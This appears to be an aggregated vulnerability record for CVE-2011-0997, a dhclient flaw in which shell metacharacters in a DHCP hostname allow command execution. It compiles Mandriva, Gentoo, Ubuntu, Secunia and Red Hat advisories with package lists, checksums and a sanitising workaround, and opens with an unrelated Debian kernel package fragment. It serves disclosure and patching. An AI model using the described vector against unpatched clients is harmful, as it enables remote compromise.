http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3_all.deb Size/MD5 checksum: 25902158 321403201a198371fd55c9b8ac4583f7 Sun Sparc architecture: http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u_22woody1_sparc.deb Size/MD5 checksum: 3923058 db7bbd997410667bec4ac713d81d60ea http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u-smp_22woody1_sparc.deb Size/MD5 checksum: 4044796 106fcb86485531d96b4fdada61b71405 http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u_26woody1_sparc.deb Size/MD5 checksum: 3831424 347b0c290989f0cc99f3b336c156f61d http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u-smp_26woody1_sparc.deb Size/MD5 checksum: 3952220 f7dd8326c0ae0b0dee7c46e24023d0a2 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-headers-2.4.19_2.4.19-0.020911.1.woody5_mips.deb Size/MD5 checksum: 3890804 7348a8cd3961190aa2a19f562c96fe2f http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r4k-ip22_2.4.19-0.020911.1.woody5_mips.deb Size/MD5 checksum: 2080618 d52d00e7097ae0c8f4ccb6f34656361d http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r5k-ip22_2.4.19-0.020911.1.woody5_mips.deb Size/MD5 checksum: 2080830 db7141d3c0d86a43659176f974599cc2 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/mips-tools_2.4.19-0.020911.1.woody5_mips.deb Size/MD5 checksum: 15816 c31e3b72d6eac6f3f99f75ea838e0bf9 These files will probably be moved into the stable distribution on its next update
var-201104-0082 dhclient in ISC DHCP 3.0.x through 4.2.x before 4.2.1-P1, 3.1-ESV before 3.1-ESV-R1, and 4.1-ESV before 4.1-ESV-R2 allows remote attackers to execute arbitrary commands via shell metacharacters in a hostname obtained from a DHCP message, as demonstrated by a hostname that is provided to dhclient-script. The ISC dhclient contains a vulnerability that could allow a remote attacker to execute arbitrary code on the client machine. Apple From Apple Time Capsule and AirPort Base Station (802.11n) Firmware update for has been released.Crafted DHCP Any command may be executed by processing the response. A remote attacker can exploit this issue through a rogue DHCP server. Additionally for Corporate Server 4 and Enterprise Server 5 ISC DHCP has been upgraded from the 3.0.7 version to the 4.1.2-P1 version which brings many enhancements such as better ipv6 support. Packages for 2009.0 are provided as of the Extended Maintenance Program. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0997 http://ftp.isc.org/isc/dhcp/dhcp-4.1.2-P1-RELNOTES https://www.isc.org/software/dhcp/advisories/cve-2011-0997 _______________________________________________________________________ Updated Packages: Mandriva Linux 2009.0: 0fe2b147ebdba8b68f69ddc27160db5c 2009.0/i586/dhcp-client-4.1.2-0.4mdv2009.0.i586.rpm f4ee7090da2bec5cb4482f2fa21beb8b 2009.0/i586/dhcp-common-4.1.2-0.4mdv2009.0.i586.rpm a4a5bd2f2d8f4d40a4c60d5dde55307c 2009.0/i586/dhcp-devel-4.1.2-0.4mdv2009.0.i586.rpm 814bc88e335fb03901f326300ae92961 2009.0/i586/dhcp-doc-4.1.2-0.4mdv2009.0.i586.rpm ec52571bb8002e9394b1eb6e6fc95b64 2009.0/i586/dhcp-relay-4.1.2-0.4mdv2009.0.i586.rpm e7fed43b5db92babf8ca3acbd7210b7f 2009.0/i586/dhcp-server-4.1.2-0.4mdv2009.0.i586.rpm 18489ac449e257f1fa9aad9e7a054b45 2009.0/SRPMS/dhcp-4.1.2-0.4mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: b557459f67de2b8ec481d313d9a26cb2 2009.0/x86_64/dhcp-client-4.1.2-0.4mdv2009.0.x86_64.rpm b4ea7a9670866fff6cd3f4eb77073a84 2009.0/x86_64/dhcp-common-4.1.2-0.4mdv2009.0.x86_64.rpm 4f9a9c9a9815697e17a65b942771e31d 2009.0/x86_64/dhcp-devel-4.1.2-0.4mdv2009.0.x86_64.rpm df18345c665846817880f815af0ad0e8 2009.0/x86_64/dhcp-doc-4.1.2-0.4mdv2009.0.x86_64.rpm eac313ff664e3ea9f8e4c3818d7b7387 2009.0/x86_64/dhcp-relay-4.1.2-0.4mdv2009.0.x86_64.rpm 48cca35591072588de0e1b9f00ca88eb 2009.0/x86_64/dhcp-server-4.1.2-0.4mdv2009.0.x86_64.rpm 18489ac449e257f1fa9aad9e7a054b45 2009.0/SRPMS/dhcp-4.1.2-0.4mdv2009.0.src.rpm Mandriva Linux 2010.0: 88ba2b9d0ccfddf8b1b6f516851d08ce 2010.0/i586/dhcp-client-4.1.2-0.4mdv2010.0.i586.rpm 1475209ee7b9fb9b7f26ad5b20afcdcf 2010.0/i586/dhcp-common-4.1.2-0.4mdv2010.0.i586.rpm ea29d2bfd21b02a56057cd36dc21f43a 2010.0/i586/dhcp-devel-4.1.2-0.4mdv2010.0.i586.rpm 067c3ac4f7530e447f82bbe4326253a3 2010.0/i586/dhcp-doc-4.1.2-0.4mdv2010.0.i586.rpm 409516cfb0004d5f4522040b81433ce7 2010.0/i586/dhcp-relay-4.1.2-0.4mdv2010.0.i586.rpm a23871dfa6632571cdf4a2559941ad89 2010.0/i586/dhcp-server-4.1.2-0.4mdv2010.0.i586.rpm 265c9ec68af7e23baf8b1b6fcc4cc64f 2010.0/SRPMS/dhcp-4.1.2-0.4mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: 403dfe148141d926bc2f5e31c18360ba 2010.0/x86_64/dhcp-client-4.1.2-0.4mdv2010.0.x86_64.rpm 2cd0331b9935442a68d606e1d58b0608 2010.0/x86_64/dhcp-common-4.1.2-0.4mdv2010.0.x86_64.rpm 80a31ea430793ce9d2269c9d31aa03bd 2010.0/x86_64/dhcp-devel-4.1.2-0.4mdv2010.0.x86_64.rpm d5053dc644215e70dfc5380afdbc90c4 2010.0/x86_64/dhcp-doc-4.1.2-0.4mdv2010.0.x86_64.rpm 377fe3099561dd0a795617977164b91f 2010.0/x86_64/dhcp-relay-4.1.2-0.4mdv2010.0.x86_64.rpm 57b98ba8696c7a7d20ab96a823f4ff0d 2010.0/x86_64/dhcp-server-4.1.2-0.4mdv2010.0.x86_64.rpm 265c9ec68af7e23baf8b1b6fcc4cc64f 2010.0/SRPMS/dhcp-4.1.2-0.4mdv2010.0.src.rpm Mandriva Linux 2010.1: 5b603213aa47a9772cf786ae6ee046da 2010.1/i586/dhcp-client-4.1.2-0.4mdv2010.2.i586.rpm 3046be07aaa09d1b39fcc8c07ef25e58 2010.1/i586/dhcp-common-4.1.2-0.4mdv2010.2.i586.rpm 1b5a481f6db0b53e666884cfda6ac44c 2010.1/i586/dhcp-devel-4.1.2-0.4mdv2010.2.i586.rpm 279beab531b59a715c946a00bd58fc48 2010.1/i586/dhcp-doc-4.1.2-0.4mdv2010.2.i586.rpm a328ab24b56f1ac03f8f420acd0a3806 2010.1/i586/dhcp-relay-4.1.2-0.4mdv2010.2.i586.rpm f7c61c55748270add2fe45d3245895c8 2010.1/i586/dhcp-server-4.1.2-0.4mdv2010.2.i586.rpm 30d4e8965d393765fb98b425889df126 2010.1/SRPMS/dhcp-4.1.2-0.4mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: 27f78c74028b1ea64dbd596c05cfa83f 2010.1/x86_64/dhcp-client-4.1.2-0.4mdv2010.2.x86_64.rpm ab56614386900415fecba15f4c17db13 2010.1/x86_64/dhcp-common-4.1.2-0.4mdv2010.2.x86_64.rpm 535a2eb4b6a4b1f78f47201e0b4249c3 2010.1/x86_64/dhcp-devel-4.1.2-0.4mdv2010.2.x86_64.rpm 64e9bac6fe8f4dbee3e1aebd5d91e977 2010.1/x86_64/dhcp-doc-4.1.2-0.4mdv2010.2.x86_64.rpm 612892e71f2aeddfd8b55cd7ac220247 2010.1/x86_64/dhcp-relay-4.1.2-0.4mdv2010.2.x86_64.rpm 9bb46bca8de30ee4b99bfe09867a3924 2010.1/x86_64/dhcp-server-4.1.2-0.4mdv2010.2.x86_64.rpm 30d4e8965d393765fb98b425889df126 2010.1/SRPMS/dhcp-4.1.2-0.4mdv2010.2.src.rpm Corporate 4.0: f49d86732da26402b022b2d980049c03 corporate/4.0/i586/dhcp-client-4.1.2-0.4.20060mlcs4.i586.rpm acd985bc51c25cc42325befb357b0dcc corporate/4.0/i586/dhcp-common-4.1.2-0.4.20060mlcs4.i586.rpm c01506a802e46af23c8f10a72c6a0eb2 corporate/4.0/i586/dhcp-devel-4.1.2-0.4.20060mlcs4.i586.rpm 81522530fa5e97057d6eeea18ad7bec3 corporate/4.0/i586/dhcp-doc-4.1.2-0.4.20060mlcs4.i586.rpm 2ebfdf7ee9224b7403c4ab5e8370d9ab corporate/4.0/i586/dhcp-relay-4.1.2-0.4.20060mlcs4.i586.rpm c2bbacf8934b9e3dc78cdb49cd811ec9 corporate/4.0/i586/dhcp-server-4.1.2-0.4.20060mlcs4.i586.rpm ac3031a0c5dfeb6274aa28d669e66cba corporate/4.0/SRPMS/dhcp-4.1.2-0.4.20060mlcs4.src.rpm Corporate 4.0/X86_64: 2747bf835e111141b9a91dc320eeab43 corporate/4.0/x86_64/dhcp-client-4.1.2-0.4.20060mlcs4.x86_64.rpm 0c998112346a5da94e09d55c996d6dff corporate/4.0/x86_64/dhcp-common-4.1.2-0.4.20060mlcs4.x86_64.rpm fd38ef505da0c593ef900895abeb1ddc corporate/4.0/x86_64/dhcp-devel-4.1.2-0.4.20060mlcs4.x86_64.rpm 69b3d6cbf21c46828de40a322fd1310d corporate/4.0/x86_64/dhcp-doc-4.1.2-0.4.20060mlcs4.x86_64.rpm c5acb788ae76e674952d656fa9b0d1a5 corporate/4.0/x86_64/dhcp-relay-4.1.2-0.4.20060mlcs4.x86_64.rpm e19db50139a291a7acd23491af5f8d54 corporate/4.0/x86_64/dhcp-server-4.1.2-0.4.20060mlcs4.x86_64.rpm ac3031a0c5dfeb6274aa28d669e66cba corporate/4.0/SRPMS/dhcp-4.1.2-0.4.20060mlcs4.src.rpm Mandriva Enterprise Server 5: 7cbe686b047a6fd6f95cda44669e5862 mes5/i586/dhcp-client-4.1.2-0.4mdvmes5.2.i586.rpm af8b9fe15591b76c11f2257e0cb43a37 mes5/i586/dhcp-common-4.1.2-0.4mdvmes5.2.i586.rpm 2a22a53e6de1a9333c36c5cc250c5ac4 mes5/i586/dhcp-devel-4.1.2-0.4mdvmes5.2.i586.rpm 9ca551145fc79919000a61419e72de37 mes5/i586/dhcp-doc-4.1.2-0.4mdvmes5.2.i586.rpm e9faa5fae712882720b107eb02e51f1f mes5/i586/dhcp-relay-4.1.2-0.4mdvmes5.2.i586.rpm 8568f3bac9dd6654b63ebee94c33275e mes5/i586/dhcp-server-4.1.2-0.4mdvmes5.2.i586.rpm 0e5415cf40dde2931cd1b81aada5e7f7 mes5/SRPMS/dhcp-4.1.2-0.4mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 87ae497e9b94fb842718b4fbefb55474 mes5/x86_64/dhcp-client-4.1.2-0.4mdvmes5.2.x86_64.rpm 71d70558972e1f0729513fce69183de2 mes5/x86_64/dhcp-common-4.1.2-0.4mdvmes5.2.x86_64.rpm 0f12150d87816bd1770388d8dc309d21 mes5/x86_64/dhcp-devel-4.1.2-0.4mdvmes5.2.x86_64.rpm 0450f2a86dab4988d1c96a8e9747104f mes5/x86_64/dhcp-doc-4.1.2-0.4mdvmes5.2.x86_64.rpm 6a043f417310b6229e8fb8d967c12a8d mes5/x86_64/dhcp-relay-4.1.2-0.4mdvmes5.2.x86_64.rpm e4281f48c410412f60fd33f095b9199c mes5/x86_64/dhcp-server-4.1.2-0.4mdvmes5.2.x86_64.rpm 0e5415cf40dde2931cd1b81aada5e7f7 mes5/SRPMS/dhcp-4.1.2-0.4mdvmes5.2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. Depending on the script and OS, this can result in execution of exploit code on the client. CVSS Score: 6.8 (AV:A/AC:L/Au:N/C:P/I:N/A:C) For more information on CVSS scores, visit http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2 Workarounds: On SUSE systems, it is possible to disable hostname update by setting DHCLIENT_SET_HOSTNAME="no" in /etc/sysconfig/network/dhcp. Other systems may add following line to dhclient-script at the beginning of the set_hostname() function: new_host_name=${new_host_name//[^-.a-zA-Z0-9]/} In environments where filters/acls can be put into place to limit clients to accessing only legitimate dhcp servers, this will protect clients from rogue dhcp servers deliberately trying to exploit this bug. However, this will not protect from compromised servers. Active exploits: None known at this time. https://www.isc.org/downloads/all No patch is available for 4.0.x as it is EOL. Anyone running 4.1.x should upgrade to 4.1-ESV-R2. These options are reused in an insecure fashion by dhclient scripts. For the oldstable distribution (lenny), this problem has been fixed in additional update for dhcp3. For the stable distribution (squeeze), this problem has been fixed in version 4.1.1-P1-15+squeeze2. For the testing distribution (wheezy), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 4.1.1-P1-16.1. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201301-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: ISC DHCP: Denial of Service Date: January 09, 2013 Bugs: #362453, #378799, #393617, #398763, #428120, #434880 ID: 201301-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in ISC DHCP, the worst of which may allow remote Denial of Service. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/dhcp < 4.2.4_p2 >= 4.2.4_p2 Description =========== Multiple vulnerabilities have been discovered in ISC DHCP. Please review the CVE identifiers referenced below for details. Resolution ========== All ISC DHCP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/dhcp-4.2.4_p2" References ========== [ 1 ] CVE-2011-0997 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0997 [ 2 ] CVE-2011-2748 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2748 [ 3 ] CVE-2011-2749 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2749 [ 4 ] CVE-2011-4539 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4539 [ 5 ] CVE-2011-4868 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4868 [ 6 ] CVE-2012-3570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3570 [ 7 ] CVE-2012-3571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3571 [ 8 ] CVE-2012-3954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3954 [ 9 ] CVE-2012-3955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3955 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201301-06.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . ========================================================================== Ubuntu Security Notice USN-1108-2 April 19, 2011 dhcp3 vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 10.10 - Ubuntu 10.04 LTS - Ubuntu 9.10 Summary: An attacker's DHCP server could send crafted responses to your computer and cause it to run programs as root. Due to an error, the patch to fix the vulnerability was not properly applied on Ubuntu 9.10 and higher. Original advisory details: Sebastian Krahmer discovered that the dhclient utility incorrectly filtered crafted responses. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 10.10: dhcp3-client 3.1.3-2ubuntu6.2 Ubuntu 10.04 LTS: dhcp3-client 3.1.3-2ubuntu3.2 Ubuntu 9.10: dhcp3-client 3.1.2-1ubuntu7.3 In general, a standard system update will make all the necessary changes. ---------------------------------------------------------------------- Q1 Factsheets released: http://secunia.com/resources/factsheets/2011_vendor/ ---------------------------------------------------------------------- TITLE: ISC DHCP "dhclient" Response Processing Input Sanitation Vulnerability SECUNIA ADVISORY ID: SA44037 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44037/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44037 RELEASE DATE: 2011-04-07 DISCUSS ADVISORY: http://secunia.com/advisories/44037/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/44037/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=44037 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in ISC DHCP, which can be exploited by malicious people to compromise a vulnerable system. This can be exploited to submit shell commands to the "dhclient-script" script via e.g. a specially crafted "hostname" response. The vulnerability is reported in versions 3.0.x through 4.2.x. SOLUTION: Update to version 3.1-ESV-R1 and 4.1-ESV-R2 or 4.2.1-P1. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: The vendor credits Sebastian Krahmer and Marius Tomaschewski, SUSE Security Team. ORIGINAL ADVISORY: https://www.isc.org/software/dhcp/advisories/cve-2011-0997 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: dhcp security update Advisory ID: RHSA-2011:0840-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-0840.html Issue date: 2011-05-31 CVE Names: CVE-2011-0997 ===================================================================== 1. Summary: Updated dhcp packages that fix one security issue are now available for Red Hat Enterprise Linux 3 Extended Life Cycle Support. The Red Hat Security Response Team has rated this update as having important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux AS (v. 3 ELS) - i386 Red Hat Enterprise Linux ES (v. 3 ELS) - i386 3. Description: The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address. A malicious DHCP server could send such an option with a specially-crafted value to a DHCP client. If this option's value was saved on the client system, and then later insecurely evaluated by a process that assumes the option is trusted, it could lead to arbitrary code execution with the privileges of that process. (CVE-2011-0997) Red Hat would like to thank Sebastian Krahmer of the SuSE Security Team for reporting this issue. All dhclient users should upgrade to these updated packages, which contain a backported patch to correct this issue. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259 5. Bugs fixed (http://bugzilla.redhat.com/): 689832 - CVE-2011-0997 dhclient: insufficient sanitization of certain DHCP response values 6. Package List: Red Hat Enterprise Linux AS (v. 3 ELS): Source: dhcp-3.0.1-10.3_EL3.src.rpm i386: dhclient-3.0.1-10.3_EL3.i386.rpm dhcp-3.0.1-10.3_EL3.i386.rpm dhcp-debuginfo-3.0.1-10.3_EL3.i386.rpm dhcp-devel-3.0.1-10.3_EL3.i386.rpm Red Hat Enterprise Linux ES (v. 3 ELS): Source: dhcp-3.0.1-10.3_EL3.src.rpm i386: dhclient-3.0.1-10.3_EL3.i386.rpm dhcp-3.0.1-10.3_EL3.i386.rpm dhcp-debuginfo-3.0.1-10.3_EL3.i386.rpm dhcp-devel-3.0.1-10.3_EL3.i386.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2011-0997.html https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is &lt;secalert@redhat.com&gt;. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2011 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFN5QSLXlSAg2UNWIIRAsdVAJ9mkD7RcbzsYOkK8JnEQsRSeelYuwCeNmZd LdK24/RBkJXiFOiY5pI8Eig= =HTuE -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.0.3-6ubuntu7.2.diff.gz Size/MD5: 68426 b4a36d1b44e8276211cef0b9bfbb6ea5 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.0.3-6ubuntu7.2.dsc Size/MD5: 1428 2fe76544defdfa3d4ab61d548ea5bc03 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.0.3.orig.tar.gz Size/MD5: 870240 f91416a0b8ed3fd0601688cf0b7df58f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.0.3-6ubuntu7.2_amd64.deb Size/MD5: 221524 2cc3c7815cb6e6a2cc21d0c2a6286202 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.0.3-6ubuntu7.2_amd64.deb Size/MD5: 454060 4d6e00d001d85359af4777316c012038 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.0.3-6ubuntu7.2_amd64.deb Size/MD5: 131252 bf862b9ce2cc9888f9e617f42c0d8f77 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.0.3-6ubuntu7.2_amd64.deb Size/MD5: 321024 383390887daadd122e7e66a9896e0432 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-client-udeb_3.0.3-6ubuntu7.2_amd64.udeb Size/MD5: 177440 04a6bc2b53da66245b8b79b71d8f82ed http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.0.3-6ubuntu7.2_amd64.deb Size/MD5: 105842 9616c95d8f2d487fd330fb9b33c58474 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.0.3-6ubuntu7.2_i386.deb Size/MD5: 196930 ebaee96958395481e8c9c25a6591c1a3 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.0.3-6ubuntu7.2_i386.deb Size/MD5: 431162 6fec8eaee0c753e95193f507e3c2c1eb http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.0.3-6ubuntu7.2_i386.deb Size/MD5: 117544 76fd573dc96ade71033c31e9965a1ede http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.0.3-6ubuntu7.2_i386.deb Size/MD5: 289684 8d0c386dc142ca3e69766e26fa6ced00 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-client-udeb_3.0.3-6ubuntu7.2_i386.udeb Size/MD5: 152296 98cdda8ba797a8f3532e2db2c95f5329 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.0.3-6ubuntu7.2_i386.deb Size/MD5: 94176 369f369a8fd6b58df3e293a5264c8047 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.0.3-6ubuntu7.2_powerpc.deb Size/MD5: 203612 da623d9e1694169cfc1de56f2e0df6e4 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.0.3-6ubuntu7.2_powerpc.deb Size/MD5: 435818 a6f18c0a5083885f0f3ad270a52f1ea9 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.0.3-6ubuntu7.2_powerpc.deb Size/MD5: 130290 8ed50d04b1c91276b0bdf19b3cda3fcd http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.0.3-6ubuntu7.2_powerpc.deb Size/MD5: 297742 95b7742e4fb7c4720add03965ef51b45 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-client-udeb_3.0.3-6ubuntu7.2_powerpc.udeb Size/MD5: 158466 61e6403a4a5db1783c43fbfe6ad74e8c http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.0.3-6ubuntu7.2_powerpc.deb Size/MD5: 96696 a7d275b7895e47d8141fab29a3db415b sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.0.3-6ubuntu7.2_sparc.deb Size/MD5: 200826 04fe774f2349b12af88465a96a4443b4 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.0.3-6ubuntu7.2_sparc.deb Size/MD5: 434238 c71c8b52f5324385d13e3610e7bef30e http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.0.3-6ubuntu7.2_sparc.deb Size/MD5: 126784 ca67a9bd308dfb73bf85906f53e8ae6b http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.0.3-6ubuntu7.2_sparc.deb Size/MD5: 294084 628696dfa6a0c9a2713b7fde4390d700 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-client-udeb_3.0.3-6ubuntu7.2_sparc.udeb Size/MD5: 156068 907d41b490e6155c580b83cec96e3f71 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.0.3-6ubuntu7.2_sparc.deb Size/MD5: 96810 d1559518c2fc467cf6244ee8cd29176b Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.0.6.dfsg-1ubuntu9.2.diff.gz Size/MD5: 97783 a2e0e7077df662a15c039c462ecd8e3d http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.0.6.dfsg-1ubuntu9.2.dsc Size/MD5: 1537 ccf77a9747dc8cbc6b65e0d94ab9c43b http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.0.6.dfsg.orig.tar.gz Size/MD5: 724045 e89ef34005c576ddbb229e3b4478f6e2 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client-udeb_3.0.6.dfsg-1ubuntu9.2_amd64.udeb Size/MD5: 180140 9b8c326a22be742b43e2b8d9b07d4f86 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.0.6.dfsg-1ubuntu9.2_amd64.deb Size/MD5: 242126 8053c2330e512d48f0318af10079c50a http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.0.6.dfsg-1ubuntu9.2_amd64.deb Size/MD5: 300696 15bbfae5ba97f27d0c896b886773f02b http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.0.6.dfsg-1ubuntu9.2_amd64.deb Size/MD5: 124032 82fe33e521c7ee08b7a00596acc8cb8d http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.0.6.dfsg-1ubuntu9.2_amd64.deb Size/MD5: 342596 40acd4d59e72be79a5c930254bee0223 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.0.6.dfsg-1ubuntu9.2_amd64.deb Size/MD5: 114396 5e5c7a86cec5ef70f927cbf53fffec4d i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client-udeb_3.0.6.dfsg-1ubuntu9.2_i386.udeb Size/MD5: 159988 7c2cd082adad4cdae500b88b9429ea24 